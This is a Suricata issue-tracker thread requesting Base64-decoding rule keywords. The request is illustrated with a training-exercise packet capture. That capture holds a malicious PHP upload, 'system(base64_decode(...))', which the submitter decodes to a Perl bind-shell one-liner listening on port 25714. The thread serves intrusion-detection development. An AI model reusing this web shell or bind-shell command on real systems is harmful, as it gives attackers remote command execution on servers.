Feature #380
closedBase64 decoding
Description
I think it is important for Suricata to support Base64 decode/data rule keywords (a few of them).
pcap 22to35.pcap attached.
In it (packet #12 - if you open it with wireshark)
This below is the hex data in packet #12 from 22to35.pcap
3b205048505345535349443d5b2a5d204572726f722072657472696576696e6720636f6f6b6965210a0d0a436f6e74656e742d4c656e6774683a203338350d0a0d0a2d2d6432746d53490d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d227573657266696c65223b2066696c656e616d653d224f624879644269353157677230636a48514936752e706870220d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a0d0a3c3f7068702073797374656d286261736536345f6465636f64652827634756796243417454556c504943316c4943636b6344316d62334a724b436b375a586870644378705a6952774f33646f6157786c4b43526a5057356c6479424a547a6f365532396a613256304f6a704a546b56554b4578765932467355473979644377794e5463784e4378535a58567a5a5377784c4578706333526c62696b74506d466a5932567764436c374a483474506d5a6b6233426c6269676b597978334b5474545645524a5469302b5a6d5276634756754b43526a4c4849704f334e356333526c625352664948646f6157786c504435394a773d3d2729293f3e0d0a2d2d6432746d53492d2d
This below is the same data into text (ASCII)
; PHPSESSID=[*] Error retrieving cookie! ##here at the end most likely there is missing colon, maybe... Content-Length: 385 --d2tmSI Content-Disposition: form-data; name="userfile"; filename="ObHydBi51Wgr0cjHQI6u.php" Content-Type: text/plain <?php system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwO3doaWxlKCRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyNTcxNCxSZXVzZSwxLExpc3RlbiktPmFjY2VwdCl7JH4tPmZkb3BlbigkYyx3KTtTVERJTi0+ZmRvcGVuKCRjLHIpO3N5c3RlbSRfIHdoaWxlPD59Jw=='))?> --d2tmSI--
This below is the decoded (from base 64) to asci data in the "php system(base64_decode..." function
perl -MIO -e '$p=fork();exit,if$p;while($c=new IO::Socket::INET(LocalPort,25714,Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}'
or the attack itself, since this is a pcap from the cyber games/trainings.
We could effectively still search for the data using rules, but we have to covert text to base64 and use it as "content" and it gets tricky.
It would be much easier if we have base64 decode keyword, since there are a lot of on-line apps that use base64.
packet #7 is the same thing.
Files
Updated by Victor Julien over 12 years ago
- Description updated (diff)
- Assignee set to OISF Dev
- Target version set to TBD
Updated by Victor Julien almost 12 years ago
The smtp mime decoding work here https://github.com/inliniac/suricata/pull/224 includes a base64 decoder. Maybe we can use that once it's merged.
Updated by Victor Julien about 9 years ago
This should now be addressed through #1282
Updated by Victor Julien over 8 years ago
- Status changed from New to Closed
- Assignee deleted (
OISF Dev) - Target version deleted (
TBD)